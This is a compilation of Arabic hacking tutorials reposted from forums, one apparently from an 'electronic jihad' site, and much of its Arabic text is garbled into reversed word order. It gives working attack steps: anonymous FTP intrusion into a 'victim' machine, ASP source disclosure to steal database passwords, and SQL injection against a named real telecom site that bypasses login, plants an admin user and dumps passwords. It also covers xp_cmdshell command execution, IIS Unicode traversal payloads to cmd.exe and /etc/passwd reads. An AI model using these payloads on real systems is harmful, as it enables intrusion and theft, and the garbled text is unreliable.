تخطيتخطوة فقد الرد هدا على تحصلت إداConnected to www.assassin.com
220 websrv1 Microsoft FTP Service )Version 4.0(.التالية الكتابة أكتب اآلن و
ftp<quote user ftpتخطيتخطوة فقد الرد هدا على تحصلت إدا
331 Anonymous acces allowed, send identify )e-mail name( as password.
التالية الكتابة أكتب اآلن وftp<quote cwd ~root
تخطيتخطوة فقد الرد هدا على تحصلت إدا530 Please login with USER and PASS
التالية الكتابة أكتب ثمftp<quote pass ftp
تخطيتخطوة فقد الرد هدا على تحصلت إدااإلقتحام في نجحت و
230 Anonymous user logged in.الضحية جهاز في اآلن أنت مبروك
بإستعمال تقوم ان اال اآلن عليك ماالفتيبي اوامر
الي المشكلة في تقعو ال لكي الكرام مرور عليها امر لن طبعا وعلى فكرة ال و أعرف ما دون من اإلقتحام نجاح هي و فيها وقعت
من بقاليأكثر تضحكو ان اردتم إدا و الفتيبي انا 20اوامر و دقيقة لهدا و شيء أي أعمل أن دون من عالقة الضحية و اإليدي مجمد
اإلقتحام نجاح بعد مباشرةا تطبقوها لكي الىوامر بحضير قمت
Pwdديسك الهارد يحتويه ما تعر لكي
Cd مثال مجلد إلقتحامCd black
بالك المسمى مجلد بإقتحام قمت المثال هدا فيLs
ديسك الهارد أو المجلد محتوى لك يتضح لكيGet
جهازك بتاع المكتب الىسطح تحمل لكيمثال
Get black.exePut
ل العكسية العمليةGet
في تضعه و جهازك بتاع المكتب سطح ملفمن تأخد ان يعنيالضحية جهاز فيمثال
Put black.exeClos
الضحية مع اإلتصال لقطع
الي الرسائل أنواع على تطرق سون اآلن و األوامر أهم هديو شرحها و األوام تطبيق أثناء الضحية جهاز من عليها نتحصل
ارقامها
Codes: Signification:110 Restart marker reply.
120 Service ready in nnn minutes. )nnn est un temps(125 Data connection already open; transfer starting.150 File status okay; about to open data connection.
200 Command okay.202 Command not implemented, superfluous at this site.
211 System status, or system help reply.212 Directory status.
213 File status.214 Help message.
215 NAME system type.220 Service ready for new user.
221 Service closing control connection.225 Data connection open; no transfer in progress.
226 Closing data connection.227 Entering passive mode )h1, h2, h3, h4, p1, p2(.
230 User logged in, proceed.250 Requested file action okay, completed.
257 "PATHNAME" created.331 User name okay, need password.
332 Need account for login.350 Requested file action pendingfurther information.421 Service not available, closing control connection.
425 Can't open data connection.426 Connection closed; transfer aborded.
450 Requested file action not taken. )Fichier déjà utilisé par autre chose(
451 Requested action aborded: local error processing.452 Requested action not taken. )Pas assez de mémoire pour
exécuter l'action(500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.502 Command not implemented.503 Bad sequence of commands.
504 Command not implemented for that parameter.530 Not logged in.
532 Need account for storing files.550 Requested action not taken. )Fichier non trouvé, pas d'accès
possible,...(551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. )Nom de fichier non attribué(
،،،انتهى
الـ " " SQLاختراق
> الحلم منتدى من >منقول> linuxray :الكاتب<
ال : االسكيو ماهي البداية في ؟؟) SQL ( س
واغلب جداول على تحتوي بيانات قاعد عن عبارة هي ال االسكيوب منتهية صفحاتها تكون التي تسحب ASP المواقع صفحات هي
بياناتهاقاعدة المعلومات ASP وصفحات SQL من من كنز تكون ان ممكنبيانات قواعد و SQL الختراق ، الحقا اليه اشير ماسوف SQL وهذا
البورت على 1433تتنصتال ان به اخبرك ان مااريد قاعدة SQL ايضا من اكثر على تحتوي قد
يمكن الجداول من عدد على تحتوي بيانات قاعدة وكل بياناتبيانات كبرقواعد تتصور التى SQL ان البيانات من الكبير والعدد
. تحتويها
بيانات : قاعدة اخترقت اذا منه استفيد ان يمكن مالذي ؟ SQL ساقصد ال منتدى الموقع هذا كان اذا الموقع نشاط حسب على هذا
منتديات PHP منتديات جميع ASP بل على تحصل الغالبسوف فياسماء
موضوع اي وحذف تعديل وبامكانك السر وكلمات المستخدمينميزة على يحتوي الموقع كان اذا اما ، بها تحلم تكن لم وصالحيات
، االيميالت من خيالية اعداد على تحصل فسوف المراسالت قائمةاذن ثريا تصبح وسوف واالعالن للدعاية شركة بانشاء قم عندها
_LinuxRay التنسىارقام - اشخاص معلومات بيانات قواعد داخل شئ اي تجد ان توقعتصبح - - ان ممكن ، الميالد تورايخ عناوين . Administrator هواتف
جديد من نشاطك استعد لكن االن الملل اصابك قد انه اعرفطويال مازال ... فالطريق
بيانات : قواعد على للدخول تحتاجة مالذي ؟ SQL س
لل فقط Passwd و User Name تحتاج
؟ : المرور وكلمة المستخدم اسم على احصل اين من س
على للحصول عديدة طرق كما User name and Passwd هناك منهاال نوع ASP اسلفصفحات من اخرى ثغرات sql.* وملفات هناك
يمكن كثيرثغرة مثل المرور كلمات على منها تحصل htr.+ ان
الثغرة هذه تستخدم : كيف
http://target/page.asp+.htr target : الهدف الموقع
Page : صفحة asp+.htr : الثغرة
حرف .... اي على التحتوي بيضاء صفحة بفتح احيانا تقوم الثغرة هذههو الفائدة منها اذن مالفائدة تتساءل سوف انك اعرف
الى اذهب البيضاء الصفحة هذه اوامر View Source خلف ترى لكيب الخاصة الوضع ASP البرمجة في تراها ان لك اليمكن التى
مثل : العادي
>%
Set DB= Server.CreateObject)"ADODB.Connection"(DB.Open "DRIVER=SQL
Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft )R( Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%<-----------------------------------------------------------------
هو المستخدم اسم ان ترى السابق الكود LinuxRay_ فيهي السر 6666666وكلمة
-----------------------------------------------------------------
ال صفحة في خطأ هناك كان اذا احيانا انه المضحك مثل ASP الشئ: االتي
AMicrosoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
بامتداد ينتهي ملف يتم inc.* هناك اوامر على يحتوي ملف هذاوكلمة المستخدم اسم على ويحتوي الملقم جانب من تنفيذها
المرورالملففي اسم باضافة وذلك الملف هذا بسحب قم تنتظر ماذا اذن
الموقع . عنوان
صفحة في االمر هذا مثل ترى ان ASP وممكنملف داخل البرمجة اوامر ان يعني هذا عليها الثغرة تطبيق عند
database.inc
>!--#include file = "database.inc"--<
ملفات مثل المرور كلمة على تحتوي ملفات عدة وهناك
global.asa++global.asa
beforemilion-global.asa-global.asamilion.sql
global-direct.asa
هو هذا لكن االسماء بهذه الملفات تكون ان الضرورة ليسمنمبرمجين قبل من عليه SQL المعتاد
االتي مثل الصفحة اسم تكتب ان فعله ماعليك : وكل
global.asa+.htr
في قديمة ثغرة صفحة IIS 3 هناك بعد تضيف ان هذا ASP وهييلي data$:: الرمز كما
file.asp::$dataعلى اال التعمل الثغرة فقط IIS 3 هذه بتطبيقها نفسك تتعب فال
اكثر ال . للعلم
المستخدم ... اسم على الحصول بعد ماذا النهاية من اقتربنا لقد؟؟ المرور وكلمة
ال قاعدة على الدخول !! SQL بعدها
استخدم انا البينات قاعدة على تدخل برامج عدة Visual هناكinterdev 6.0 السهل البرنامج استخدام افضل مازلت ACCESS لكني
2000
قائمة الى الذهاب البرنامح فتح هو فعله عليك ما كلFileاخترNew
اختار الجديدة الملفات قائمة ومنProject )Exiting Data(
موجودة بيانات قاعدة مشروع . اياختر الملف النشاء مربع لك سيظهر
Createانشاء اي
مربع سترى االنData Link Properties
اسم - بي االي او الموقع اسم معلومات لثالث فقط تحتاجالمرور - كلمة المستخدم
صندوق - 1 في الموقع اسم Select or enter server name ادخل
في - 2 المستخدم User Name اسم
السر - 3 Password كلمة
مربع ( مالحظة من الصح بإزالة )Blank Password قم
على البداية في الختبار Test Connection اضغط االسفل فيالعبارة هذه رأيت اذا البيانات بقاعدة Test Connection االتصال
Succeededبنجاح تم البيانات بقاعدة االتصال ان .فمعناه
القائمة من اليها الدخول تريد بيانات قاعدة اي تختار ان االن يمكنك: المسندلة
Select the data base on the serverعلى موافق OK واضغط . او
،،،انتهى
الـ " عن " SQLدرسمفصل
> اإلسالمية الحزم شبكة منتديات من >منقول> hish_hish :الكاتب<
نحن ما ومنها ديناميكيه صفحات إلستخدام المواقع غالبية أتجهتفيه موجودين
المعلومات من كبير كم فيها بيانات قواعد , وتستخدمالديناميكيه الويب لغات بإحدى مكتوب سكربت طريق أو PHP وعن
ASPالبيانات قواعد محركات مع جمب إلى جمبا تعمل . والتي
SQL Server , MySQL,Oracleالبقيه وترك المطلوبه المعلومات أستخالص يتم
بعضها ويستخدم تعالج ثم ومن المستخدم من معلومات تأخذ حيثتكون في
الـ بعض SQL أوامر صحة من التأكد أو البيانات أستخالص ليتملبناء المدخالت
رفضه أو المستخدم قبول أو المطلوبه الصفحةالتي الصفحات في مرور وكلمة مستخدم أسم طلب يتم دائما
ال عمل بعمل تخولكبها للقيام الصالحيه بإعطائه الموقع صاحب قام من إال به يقوم
موضوعي بحذف يقوم القائمه كأن في تثبيته أو (((وأن البيانات قاعدة في المستخدم أسم وجود من التأكد يتم حيث
أسم بجانب الموجوده لتلك مطابقه المعطاه المرور كلمةالمستخدم
الـ أمر في وتضمينها معلومه أخذ يتم بالتأكد SQL حيث يقوم الذيوصالحيتها وجودها من
للتأكد المستخدم بتوثيق يقوم سكربت كتابة عند الحذر يجب ولكنال أم المحميه للصفحه بالدخول له مخول أنه من
من وخلوها المستخدم من المستقبله القيم نظافة من بالتأكد وذلكالـ أمر تجعل أن شأنها من رموز خاطئ SQL أي
به مسموح غير أمر بأي القيام أو بنائه في
يسمى ما عن اآلن SQL injection سنتكلمموقع بوجود وأيضا التوثيق سكربت كتابة ضعففي أنه حيث
للتجربهالسعوديه اإلتصاالت شركة موقع وهو
الموقع /http://www.stc.com.sa عنوانخدمة يختصبمقدمي رابط نجد الرئيسيه للصفحة الدخول عند
السعوديه في أنترنتhttp://www.stc.com.sa/arabic/scripts...asp?pagenum=25 وهو
مرور وكلمة مستخدم أسم منك يطلب فأنه دخوله !!!! عندالـ هو لنا يتبادر ما أول هذه الحاله في SQL injection دائما
بتجربة نقوممستخدم ' : أسم
مرور ' : وكلمةالتالي الخطأ على فنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
quotation mark before the character string '' '. /arabic/Scripts/ar_csd_reply.asp, line 33
________________________________________
التالي الخطا يظهر الحاالت بعض وفي :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
quotation markbefore the character string ''' AND Password=''.
/admin/admin.asp, line 13________________________________________
الـ أمر من جزء على حصلنا هذا الخطأ أحد SQL وفي أسم وأيضاالجدول في األعمده
عمل أمكانية يؤكد ما للتحقق SQL Query للـ inject وهو المستخدمهالمدخله المرور وكلمة المستخدم أسم . صالحية
الـ عن لنتكلم التفصيل SQL injection إذن من بشيءالمستخدم اسم صالحية من بالتأكد يقوم سكربت لدينا كان لو
بالطريقة منها سنتحقق قأننا المستخدم من المدخله المرور وكلمةالتاليهcode:
________________________________________
SELECT * from Users WHERE User_Name='>field from web form<' AND Password='>field from web form<'
if) TRUE ({Login OK
}else {
Login FAILD}
________________________________________
يقوم فأنه المحميه للصفحة بالدخول لهم المسموح أحد قيام عندبالدخول له يسمح أن قبل نفسه بتوثيق تأكيد بكل
به الخاصه المرور وكلمة المستخدم أسم بأدخال قيامه فعندالمستخدم admin : أسم
المرور t0ps3cr3t : كلمةالـ امر شكل التالي SQL فإن بالشكل : سيصبح
code:________________________________________
SELECT * from Users WHERE Users_Name='admin' AND Password='t0ps3cr3t'
________________________________________
جدول في سطر وجود يكون User وعند أن وهو الشرط فيه تحققالمستخدم المرور admin اسم t0ps3cr3t وكلمة
قيمة بإرجاع سيقوم األمر مخول TRUE فأن المستخدم أن أي. بالدخول
إرجاع سيتم ذلك الدخول FALSE غير رفض وسيتم
الـ : بأوامر المعرفه من القليل ولو لديك يكون أن يجب SQL مالحظه.
>field from web form< صفحة في المستخدم أدخله ما محلها يحلصالحيته من التحقق
لكلمة ' وبالمثل مستخدم كإسم بإدخال قمنا عندما تجربتنا فيالـ أمر فأن التالي SQL المرور بالشكل : أصبح
code:________________________________________
SELECT * from Users WHERE User_Name=' ' ' AND Password=' ' '________________________________________
عالمة وبقي التنصيصاألولى عالمة بإغالق قمنا أننا ونالحظبعد تغلق تنصيصلم
الخطأ رسالة لظهور أدى ما !! وهو
مستخدم ا�م بتجربة نقوم blah' OR '1'='1 : األنالمرور لكلمة .ومثلها
الـ أمر شكل SQL فيصبح
code:________________________________________
SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'
________________________________________
حدا على جزء كل األمر لنحللSELECT * from Users
الجدول من السطور جميع أختر Users تعنيWHERE User_Name='blah' OR '1'='1' AND Password='blah' OR
'1'='1'الذي وهو بإختياره سنقوم الذي السطر بتحديد نقوم الجزء هذا في
الشروط فيه تتحقق'blah' OR '1'='1'
بوجود أصبحتشرط OR هنا ولكن نصيه قيمة تصبح لماألطراف من األقل على واحد طرف كان إذا صحيح الشرط يصبح
الشرطصحيح في المشتركههو األول الطرف فإن حالتنا 'blah' وفي
قيمة عن يعبر االن صددها في لسنا تفاصيل الخوضفي بدون وهوTRUE صحيحه
هو ' األخر 1'='1والطرف 'كانت إذا عن اإلجابة لـ 1يمكنك ال 1مساويه أم !!!!
هو تحليله بعد الشرط شكل سيكون TRUE OR TRUE إذاللشرطهي النهائيه النتيجه فإن TRUE وبالتالي
المرور لكلمة تحدث التفاصيل ونفس : القيمه جدا مهمه ليست TRUE مالحظه الشرط من نحصلها التيللكلمه بنا TRUE مساويه الخاصه المفاتيح لوحة على نكتبها التي
مستخدم أسم إستخدام تحاول ال مرور TRUE لذلك TRUE وكلمةالـ SQL injection إلتمام
الجدول من سطر أول بأختيار سيقوم السابق ويرجع Users الشرطمصفوفه في محتوياته
للصفحة الدخول أستطعت قد أنك ستجد الحاالت بعض في وبالتالي المحميه
ال أخرى حاالت في ولكنالتفاصيل ..... لنكمل
الـ أمر في الشرط يكون ربما ألنه التنبه بعد SQL يجب يأتي ما وهوWHERE أشياء عدة من يتحقق
نستخدم يمكننا , )two dashes( -- لذلك حيث السطر بقية إهمال ليتمالتاليه بالمدخالت قليل قبل أدخالناه ما عن اإلستعاضه
مستخدم --'blah' OR '1'='1 : أسمكلمة ) كتابة إهمال يمكنك الحاالت بعض في المرور كلمة وكذلك
الـ -- أمر في المستخدم اسم بعد تأتي ألنها ستهملها ألن SQL مرور
أحد لتخمين تحتاج لن أنك بحيث ومضمونه جدا مريحه طريقه توجداألعمده أسماء
أستخدام having clause وهيالتاليه بالطريقه
مستخدم 'having 1=1-- أسم
كالتاليه خطأ رسالة على سنحصل حيثMicrosoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY
clause.
/Arabic/Scripts/ar_csd_reply.asp, line 33 عمود أول أسم وأيضا الجدول أسم وبها
األعمده بقية اسماء على الحصول لنستطيع بعدهاgroup by سنستخدم
التالي بالشكل--group by cs_isp_user.UserID'
أسمه عمود على سنحصل passwd بعدهاالتالي بالشكل يليه اللي العمود اسم على للحصول فنستخدمه
--group by cs_isp_user.UserID,cs_isp_user.passwd'صفحة على نحصل أن إلى العمود مع جدول كل أسم زيادة ونكرر
خاطئ المستخدم أسم بأن ! تخبرنا
في األعمده أسماء من ممكن قدر أكبر بجمع نقوم أن األن نحتاجالجدول هذا
التالي بإدخال : نقوممستخدم --)blah' group by )username : أسم
التالي الخطأ على : فنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column
name 'username'. /arabic/Scripts/ar_csd_reply.asp, line 33
________________________________________
األسم له الجدول هذا في عمود يوجد ال بأنه يفيد ما username وهومثل الشائعه األسماء بتجربه نقوم
password ,username,id,userid,email,first_name
لـ تجربتنا عنه userid عند نبحث ما وهو أخر خطأ على نحصل فأننا :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column
'cs_isp_user.passwd' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY
clause. /arabic/Scripts/ar_csd_reply.asp, line 33
________________________________________
وهو الجدول أسم وهي معلومتين على حصلنا cs_isp_user هناوهو األعمده أحد أسم passwd وأيضا
الجديد العمود اسم بإستخدام ولكن السابق العمل بتكرار االن نقومالتالي المستخدم أسم بإدخال --)blah' group by )passwd : فنقوم
التالي الخطأ على : فنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column
'cs_isp_user.UserID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY
clause. /arabic/Scripts/ar_csd_reply.asp, line 33
________________________________________
وهو عمود أسم على وهو UserID حصلنا بتخمينه قمنا ما نفسه وهوuserid
أن إلى اإلشاره األحرف MS SQL Server تجدر ليسحساسلحالةأسماء على إال نحصل وال منتهيه غير حلقه في سنكون أننا نالحظ
passwd و UserID الجداولعليها حصلنا التي وهي عمودين على إال يحوي ال الجدول إذنوبعدها للجدول جديد مستخدم بأدخال نقوم هذه الحاله في إذن
بتسجيل الخاصه الصفحه من طبيعي بشكل بالدخول نقوم الدخول
المستخدم أسم خانة في التالي بكتابة blah' INSERT INTO : سنقومcs_isp_user)UserID,passwd
( VALUES)'M_3','hi'(--مستخدم أسم له جديد مستخدم إضافة سيتم مرور M_3 حيث وكلمة
hiأنك على البيانات بهذه المحميه للصفحة الدخول تستطيع وبعدها
بالدخول له مخول
) عمل ) أمكانية استغالل من أنتهينا اإلتصاالت شركة مثالنا inject فيقرائة نستطبع لكي ممتعه طريقه عن الحديث سنكمل ولكننا لها
بأي الدخول تستطيع وبعدها مرورهم وكلمات المستخدمين اسماءنفسك إضافة دون منها
لشخصمشبوه وجود حول شكوك يضع لن الذي األمر وهواألسم له أخر عمود بإضافة ولكن بدأناه ما رقم id سنكمل وهو
) رقم ) أنه تذكر مستخدم لكل تسلسليأسمه جدول لدينا user إذن
التاليه االعمده يحويid صحيح رقم وهو
username ) أرقام ) تحوي أن يمكن النصيه القيم نصيه قيمة وهوadmin1 مثال
passwd نصيه قيمه أيضا وهي
عمل يتم ) union نجرب لن عدديه قيمة إلى وتحويلها نصيه لقيمه) جدا ثمينه خطأ رساله سيخرج ولكنه التحويلالمستخدم اسم blah' union SELECT username FROM user : ندخل
شيء في تفيدنا ال خطأ رسالة على سنحصل وهي الخطأ رسالة :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal
number of expressions in their target lists. /admin/admin.asp, line 13
________________________________________
بزيادة التالي id نقوم بالشكل فتصبح واحد مرهblah' union SELECT username,username FROM user
الخطأ نفسرسالة على فنحصلمختلفه خطأ رسالة على نحصل أن إلى الزياده نتابع
اسم أدخال عند الجديده الخطأ رسالة على حصلنا أننا لنفترضالتالي المستخدم
blah' union SELECT username,username,username,username,username FROM user
التاليه الخطأ رسالة على فنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting thevarchar value 'Lame_Admin' to a column of data type int.
/admin/admin.asp, line 13________________________________________
لألدمن يكون ما عادة وهو مستخدم أسم أول على حصلنامحرك من نطلب ألننا هو الخطأ هذا ظهور يقوم SQL وسبب أن
نصيه قيمة عدديه )Lame_Admin وهي( بتحويل قيمة إلى)int (صحيحه
يستطيع , ال أنه بأخبارك يقوم لذلك مسموح الغير الشيء وهوصحيحه Lame_Admin تحويل عدديه قيمة أذكىشي إلى هذا
بعمله microsoft قامتكلمة على الحصول وسنحاول المستخدم أسم على حصلنا االن
المرورالتالي المستخدم أسم blah' union SELECT: ندخل
passwd,passwd,passwd,passwd,passwd FROM user
المستخدم أسم على حصولنا عند السابق العدد بنفسالخطأ هذا على سنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting thevarchar value 'stupid' to a column of data type int.
/admin/admin.asp, line 13________________________________________
الدخول تسجيل ويمكننا المرور وكلمة المستخدم أسم على حصلنالنا أثر أي وجود بدون المحميه للصفحة
بعض بطباعة تقوم لها الدخول عند المحميه الصفحه كانت إذا إالبإسم بالدخول شخضقام ألخر االيبي رقم مثل المعلومات
هذا المستخدمبنفسك به ستقوم بما فكر عندها
الـ عن أتكلم Stored Procedure بقيمسبقا موجوده أدوات إلى أقرب كتشبيه بعمل Built-in وهي تقوم
طلبها عند محدد
الـ من اإلستفاده الـ Stored Procedure ستستطيع كان SQL إذاServer المستخدم على sa يعمل
الـ عليه يعمل الذي المستخدم كان إذا له SQL Server أو السماح تمبا�ستخدامها
على حصولك عند محظوظ فأنت األمكانيات SQL Server لذلك بهذه
من أكثر 100يوجد Stored Procedure أهمها التالي الجدول في
+---------------------------+------------------------------------------------------------------------------+
| xp_cmdshell----------| ( على تنفيذه يتم التشغيل لنظام أمر تمرير) المستخدم صالحيات |-------حسب
| xp_regread-----------| في مفتاح قيمة قراءة|--------------------------------------------الريجستري
| xp_regdeletekey----| من مفتاح حذف|-------------------------------------------------الريجستري
| xp_regdeletevalue-| من مفتاح قيمة حذف|--------------------------------------------الريجستري
| xp_regwrite ----------| في للكتابة|-------------------------------------------------------الريجستري
| xp_servicecontrol--| على خدمة أنهاء أو لبدأ|--------------------------------------------السيرفر
+----------------------------+-----------------------------------------------------------------------------+
الـ هذه من أي من اإلستفاده طريقة بالشكل Procedure أما فهيالتالي
'exec master..xp_cmdshell 'dir
أستخدام لطريقة مثال مثله xp_cmdshell هذا والبقيهالتالي بالشكل فهو الريجستري في الكتابة عدا
'exec master..xp_regwrite 'REGISTERY KEY' VALUE
ملفات كود قراءة بأمكانك أنه إلى اإلشاره بقي يعمل asp أيضا التيصفحة كود نسخ ثم ومن جديد جدول إضافة طريق عن الموقع عليها
asp ووضعه
التاليه بالطريقة الجدول هذا في))CREAT TABLE M_3 ) source varchar)8000
الجدول وأسم الجدول ببناء يقوم السطر عمود M_3 هذا وبداخلهالنوع من بايت 8000حجمه varchar واحد
الجدول هذا إلى السيرفر على ملف أي إضافة االن بأمكانك ذلك بعدالتالي بالشكل قرائته ثم ومن
'bulk insert M_3 from 'c:\InetPub\wwwroot\login.asp
اللي الخطأ رسائل طريق عن ذلك يمكنك نسخه تم ما ولقرائةالسابق الموضوع في عنها تكلمنا
عمل هو نسخه union أسهلها تم ما بها خطأ رسالة توليد يتم .حيثالمواقع ".25 اختراق في الهاك " درسإلحتراف
> اإلسالمية الحزم شبكة منتديات من >منقول> CONIK :الكاتب<
البداية في ولكن يتم وكيف المواقع أختراق تعلم في الله شاء أناالختراق عن أشياء نعلم أن يجب
اختراق علم في مطلوبة أساسيات نعرف أخر بمعنى أو البداية فيقلنا نحن وطبعا المواقع
الباب هو بى األى أنه االجهزة اختراق عن كان الى الدرساألول فيله المفتاح هو والبورت
وهو يختلف المفتاح ولكن باب لنا يوجد المواقع أختراق بسفيالدنيا في اختراق ومافي الثغرات
أمنى ضعف نقول ولكن ثغرة نقول المفروضما المهم ثغرة بدون:-
؟؟:- 1س لها تعريف يعنى الثغرات أيشهي لى تقول ممكن طيب
معين:- نظام دخول فى يساعدك أمنى هىضعف الثغرات جـالمساعدة الطريقة أيضا تكون وقد وأختراقه
من تتحول تخليك مستخدم administrator الى user التى من يعنىويجب وتتضمن المتصرف المدير الى
ال علشان وأستثمارها الجديدة االمنيه الثغرات معرفة الدوام علىبيها المواقع أصحاب يتنبه
تقفليها ) ( يتم يرقعوها
أكتشففي الذى األمني الضعف الثغرات لهذه مثال وأقربليونكس نظام على يركب سيرفر وهو االباتشى
ومن ثغرة تعتبر الموقع بناء قاعده أو البرامج أحد ضعففى وأىواألستفاده استخدامها الممكن
الموقع في والتحكم أختراقه المراد الموقع أختراق في منهاطريقها عن تريد ما وكل الباسوردات ومشاهدة
؟؟؟:- 2س لقيتها انا اذا الثغره استثمر انا كيف طيب
نسبة:- كانت الثغرات أكتشفوا ما وقت من الثغرات% 99جـ من بالغه مكتوبه سكربتاتها أو C تكون اللغه هذه لمعرفة تحتاج وانته
تحويلها . عليك
الى يحتاج الثغرات من العديد هناك أن من shell كما تتمكن انته حتىالضعف أخر بمعنى أو الثغره هذه من األستفاده
فى الموجوده الثغرات بعض المثال سبيل الى PHP وعلى تحتاجShell PHP الكالم هذه .ومن
الخاصة االصدارات في يكون الضعف فكرة وعلى
نوع من ثغره في نظام Kernel 2.2.x وكمان في المرة هذه ولكنليونكس تشغيل
باللغة ( تكون التى الثغرات هذه توجوده C مالحظه سيكربتات تكونالموقع باللغه ) فى مكتوبة أخرى سيكربتات أيضا perl وهناك
وأنا االوامر لوينكسعلشان مركب انته تكون الحالة هذه فى والزمتركب linux Redhat 7.3 أنصحك
سألته انا لمن هانتر بالك األخ انه وأذكر الماندريك من أفضل ألنهمبسطه صورة الماندريك انه لى قال هات الريد وال الماندريك أركب
الله وجزاة أقوى الريدهات وأنه للتطور قابله بسغير هات للريدللموضوع نرجع النصيحة هذه على خير
؟؟:- 3س البيرل لغه أحول كيف
هذه:- سوى انته البداية في عادية اوامر كلها سهله مره الطريقة جـ األمر
./file.pl
الرسالة هذه تعطيك
Access Denied---- الموافقه عدم توضح الرسالة هذه
هذه االمر بته كتا سوى عليك كا كذا لك صار أذا
chmod +x Conik.pl----- الملف أسم تكتب انته كونيك مكان الحظ
كذا زى تكون راح النتجيه وشوف ثانية مره وشغلة$ ./Conik.pl
للغة:- 4س بالنسبة طيب C
تنفيذى:- ملف يكون الملف تخلى انته الملفالزم تحويل علشان جـاالمر بهذه
gcc -o Conik Conik.c ------< بدال الملف أسم تكتب انته انه الحظتغيرة المراد كونيك أسمى
المثال سبيل على -: يعنى
gcc -o Conik conik.c
االمر هذه بعد جاهز الملف يكون وراح
./Conik.c
جاهز الملف ماصار وبعد
$ gcc -o sendmail sendmail.c
$ ./sendemail
Usage : sendmail >host< >OS< >user< >password<$ ./sendmail smtp.israel.com RedHat-7.3 anonymous anonymous
مكان >----- تبغاه الى الموقع هنا تكتب انته انك israel الحظconnecting to host...
connected...id
uid=0)root( gid=0)root(
للبرنامج الملقم ممنا طلب انه نظام Sendemail الحظ طلب وكمانوالباسورد واليوزر التشغيل
أمتياز أعطانا البرنامج كله هذه البرنامج Root وبعد قيام بسببالـ Exan noferبتنفيذ
البرنامج حطيت انا لمن أنه تضن ال بدون XXX. SENDMAIL مالحظةالبرنامج هذه فى ثغره هناك آلنه المثال هذه لك حطيت أنا سبب اى
هذه األسم تحفظ بدى بسكان تعالى الله شاء أن لك أشرحها وراح:-(
اللزوم عن زايدة الموضوع فى أتوغلنا نحنا انه الظاهراتعلم:- 5س أبغا ما أنا بسبطلت ثغره علشان هذه كل الله يا
في:- للثغرات شوية المعقده الطريقة هذه البى حبيب لووووول جـجدا جدا وسهله حلوة ثانية ثغرات
يا:- 6س ل قو أيشهي Conik نظام يبغالها الطريقة هذه ترىلغه وكمان Perl و C تشغيل
ملعومات تشوف انته يعنى المتصفح خالل من تستخدم تغرات فيهذه من الباسوردات ملف الى وتوصل المتصفح عبر الموقع
الطريقه
الثغرات هذه على PHP - CGI - UNICODE - VB - etc ومثال
اوووووة:- 7س UNICODE كيف اشوف نفسى كثير عنها سمعت أنا؟؟؟ ويشهى وأعرف شكلها
حبيبى:- نظام UNICODE جـ ضعففي عن عبارة في IIS هىMicrosoft عموما سهوله بكل الموقع أختراق في تساعد مما
جدا سهل الطرق بهذه االختراق
أمثله أضع وسوف قبل من ذكرها تم التى السابقة بالطرق مقارنةثغرات -: UONICODE على
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%
35%63../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
أنواع فى أشكل انى المستطاع قد UONICODE حاولت
الـ ثغرات الى بالنسبة عليها CGI أما مثال هذه
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/phf
/cgi-bin/wwwboard.pl
/cgi-bin/AT-admin.cgi
/cgi-bin/info2www
/cgi-bin/environ.cgi
هذه على األمر يقتصر ال يعنى الثغرات من العديد وباقى هذهالتشغيل نظام بحسب لك الثغرات أقسم وراح الثغرات
NT : Uni code , bofferoverfollow , tftp
Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD, WU-FTPD, Kernel Exploits, rootkits,
UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel exploits, rootkits, ProFTPD, WU-FTPD,
،،،انتهى
" المواقع اختراق لينكسفي " استغالل> اإللكتروني الجهاد موقع من >منقول
>Black_sNiper :الكاتب<
اختراق لينكسفي مع التعامل أراد مخصصلمن الموضوع هذافيه الكافية الخبرة وليسلديه ...المواقع
